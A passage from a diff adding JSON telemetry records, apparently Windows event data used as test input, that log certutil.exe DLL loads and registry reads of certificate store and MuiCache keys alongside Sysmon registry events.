"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573498550000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": 
"SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573498550000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573498860000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573498860000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499490000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499490000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499490000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + 
"image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499490000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499490000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499490000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\System32\\version.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499640000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499640000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499800000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "secur32.dll", + "image_path": "C:\\Windows\\System32\\secur32.dll", + "pid": 904, + 
"process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499800000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "samcli.dll", + "image_path": "C:\\Windows\\System32\\samcli.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499800000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "dsrole.dll", + "image_path": "C:\\Windows\\System32\\dsrole.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499800000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499800000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "logoncli.dll", + "image_path": "C:\\Windows\\System32\\logoncli.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499800000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499800000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": 
"C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499800000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499950016, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "dwmapi.dll", + "image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + 
"process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": 
"{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "process", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "subtype": "terminate", + "timestamp": 131883573500110000, + "unique_pid": 
"{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573500110000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
